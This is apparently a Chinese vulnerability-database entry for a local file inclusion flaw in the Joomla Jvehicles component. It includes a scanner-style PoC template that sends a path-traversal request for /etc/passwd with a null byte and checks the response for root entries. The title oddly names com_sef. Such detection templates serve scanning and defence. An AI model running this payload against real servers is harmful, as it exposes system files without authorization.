joomla-jvehicles-lfi: Joomla! Component com_sef - Local File Inclusion

日期: 2025-09-01 | 影响软件: joomla-jvehicles | POC: 已公开

漏洞描述

A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php.

PoC代码[已公开]

id: joomla-jvehicles-lfi

info:
  name: Joomla! Component com_sef - Local File Inclusion
  author: daffainfo
  severity: high
  description: A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php.
  reference:
    - https://www.exploit-db.com/exploits/11997

rules:
  r0:
    request:
      method: GET
      path: /index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

相关漏洞推荐